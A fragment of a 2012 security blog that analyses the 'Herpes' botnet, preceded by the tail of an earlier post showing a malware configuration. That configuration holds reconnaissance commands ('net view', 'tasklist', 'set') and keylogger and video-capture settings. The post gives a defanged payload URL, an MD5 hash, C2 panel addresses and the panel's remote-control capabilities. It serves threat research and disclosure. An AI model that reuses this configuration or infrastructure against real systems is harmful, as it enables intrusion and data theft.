<span style="font-family: Arial; font-size: 10.0pt;"> end<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;"> entry "CmdList"<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;"> "net view"<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;"> "tasklist"<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;"> "set"<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;"> end<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;"> <o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;"> entry "Keylogger"<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;"> processes "calc___.exe"<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;"> time 1<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;"> end<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;"> <o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;"> entry "Video"<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;"> quality 1<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;"> length 500<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;"> end<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">end<o:p></o:p></span></div>
Jose Dos Santoshttp://www.blogger.com/profile/06085925687781351552noreply@blogger.com0tag:blogger.com,1999:blog-5707299821054210891.post-33536231419921189392012-09-15T15:26:00.000-07:002012-09-15T15:26:09.382-07:00Herpes Botnet<br />
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11.0pt;">Herpes
botnet is a classical botnet with typical features for management control of
infected machines.<o:p></o:p></span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11.0pt;">It has been
found a sample of this troyan that initiates Herpes infection at:<o:p></o:p></span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11.0pt;">hxxp://boolbot.org/herp.exe<o:p></o:p></span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11.0pt;">Binary
size: 37,888<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11.0pt;">MD5:
6f0084cbc3e67cc1a7ac61a9480baf21<o:p></o:p></span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11.0pt;">Troyan
connection string with the Control Panel is:<o:p></o:p></span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11.0pt;">hxxp://boolbot.org/Herpnet/run.php<o:p></o:p></span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11.0pt;">The control
panel HERPES botnet network is accessed via the URL:<o:p></o:p></span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11.0pt;">hxxp://boolbot.org/Herpnet/<o:p></o:p></span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11.0pt;">As seen in
the login screen.<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11.0pt;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-FuaEfKyokyQ/UFTrFzx14iI/AAAAAAAAAKc/GmPTaGbsnIg/s1600/herpes.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="218" src="http://1.bp.blogspot.com/-FuaEfKyokyQ/UFTrFzx14iI/AAAAAAAAAKc/GmPTaGbsnIg/s400/herpes.jpg" width="400" /></a></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11.0pt;">After
accessing Herpes Botnet Control Panel,
it shows the statistical information of infected users for the Troyaan as shown
in the following screenshot:<o:p></o:p></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-KmRbzpTdPMw/UFTrRKuAoXI/AAAAAAAAAKk/dmoBUW4kdy8/s1600/herpes1.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="287" src="http://4.bp.blogspot.com/-KmRbzpTdPMw/UFTrRKuAoXI/AAAAAAAAAKk/dmoBUW4kdy8/s400/herpes1.jpg" width="400" /></a></div>
<div class="MsoNormal">
</div>
<div class="MsoNormal">
<span style="font-family: Arial;"><span style="font-size: 15px;"><br /></span></span></div>
<div class="MsoNormal">
<span style="font-family: Arial;"><span style="font-size: 15px;">At the time of this analysis, Botnet Panel controlled 233 infected bots machines of which just 143 were actives.</span></span></div>
<div class="MsoNormal">
<span style="font-family: Arial;"><span style="font-size: 15px;"><br /></span></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 15px;">This Panel also has a menu for remote control of infected computers, running a series of commands at online machines that are communicating with Herpes Panel</span></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-MQuo-Q0CKR0/UFTrYmSTAgI/AAAAAAAAAKs/iieO3X7HGcg/s1600/herpes-tasks.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="462" src="http://1.bp.blogspot.com/-MQuo-Q0CKR0/UFTrYmSTAgI/AAAAAAAAAKs/iieO3X7HGcg/s640/herpes-tasks.jpg" width="640" /></a></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11.0pt;"><br /></span></div>
<div class="MsoNormal">
</div>
<div class="MsoNormal">
<span style="font-family: Arial;"><span style="font-size: 15px;">the task menu in the Control Panel can run the following commands to infected machines</span></span></div>
<div class="MsoNormal">
<span style="font-family: Arial;"><span style="font-size: 15px;"><br /></span></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-5iecZgrKvYY/UFTrjZ8IpyI/AAAAAAAAAK0/5Ja7emdxZx0/s1600/herpes-commands.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://1.bp.blogspot.com/-5iecZgrKvYY/UFTrjZ8IpyI/AAAAAAAAAK0/5Ja7emdxZx0/s1600/herpes-commands.jpg" /></a></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 15px;">These commands can be launched remotely to order infected computers to capture screenshot from zombies computers as well as to capture sensitive user data for the toyan keylogger and also download other malicious binaries on the infected machine.</span></div>
<br />
Jose Dos Santoshttp://www.blogger.com/profile/06085925687781351552noreply@blogger.com0